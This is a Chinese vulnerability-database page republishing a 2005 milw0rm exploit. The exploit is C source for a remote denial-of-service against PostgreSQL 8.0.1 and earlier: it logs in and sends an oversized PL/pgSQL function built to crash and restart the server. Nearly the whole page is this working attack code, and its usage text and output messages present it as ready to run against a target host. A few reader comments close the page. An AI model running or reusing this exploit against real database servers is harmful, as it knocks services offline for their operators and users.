PostgreSQL 8.01 – Remote Reboot (Denial of Service)
漏洞ID | 1055018 | 漏洞类型 | |
发布时间 | 2005-04-19 | 更新时间 | 2005-04-19 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* PostgreSQL Remote Reboot <=8.01
* writen by ChoiX [[email protected]]
* (c) Unl0ck Research Team [www.unl0ck.org]
* info: Server can be rebooted only if plpgsql language is switched on.
* To compilate exploit you should have "libpq" library on your box
* and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include -L/usr/local/pgsql/lib -lpq
* Root exploits will be released later, coz now it's very dangerous to release it.
* greets to:
* unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe]
* m00 members: ov3r
*/
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>
#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table"
char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$n";
char declare[] = "DECLAREn";
char com[] = "t--%n";
char varible_REC[] = "trec RECORD;n";
char varible_var[] = "tvar%d varchar := 'BBBB';n";
char begin[] = "BEGINn";
char select_1[] = "SELECT INTO rec FROM %s WHEREn";
char select_2[] = "var%d = AAAA ANDn";
char select_3[] = "var1029 = AAAA;n";
char end[] = "ENDn";
char finish[] = "$$ LANGUAGE plpgsqln";
void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1n");
printf("writen by ChoiX [[email protected]]n");
printf("(c) Unl0ck Research Team [[email protected]]n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] n", name);
printf("Default port = %snDefault dbname = %sn", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}
int make_str();
int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;
while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
switch(opt){
case 'H':
host = optarg;
break;
case 'P':
port = optarg;
break;
case 'u':
user = optarg;
break;
case 'p':
password = optarg;
break;
case 'd':
dbname = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT;
if(dbname == NULL) dbname = DEFAULT_DB;
printf("tPostgreSQL Remote DoS <=8.0.1n");
printf("[*] Host/Port: %s/%sn", host, port);
printf("[*] DBname/User/Password: %s/%s/%sn", dbname, user, password);
conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
PQfinish(conn);
printf("[-] Cannot connect to the databasen");
exit(1);
}
printf("[+] Connected to the databasen");
make_str();
printf("[+] Command has been generatedn");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
printf("[+] Command has been sentn");
}
if(PQstatus(conn) == CONNECTION_BAD){
printf("[+] Server has been rebootedn");
exit(0);
} else {
printf("[-] Server hasnt been rebootedn");
exit(0);
}
}
int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;
//write char create[]
snprintf(temp, len, create, FUNC_NAME);
strcpy(str,temp);
//write char declare[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
snprintf(temp, len, varible_var, i);
strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
snprintf(temp, len, select_2, i);
strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);
return 0;
}
// milw0rm.com [2005-04-19]
相关推荐: orderdetails.aspx参数修改命令查看漏洞
orderdetails.aspx参数修改命令查看漏洞 漏洞ID 1204042 漏洞类型 未知 发布时间 2002-07-26 更新时间 2002-07-26 CVE编号 CVE-2002-0409 CNNVD-ID CNNVD-200207-106 漏洞平…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666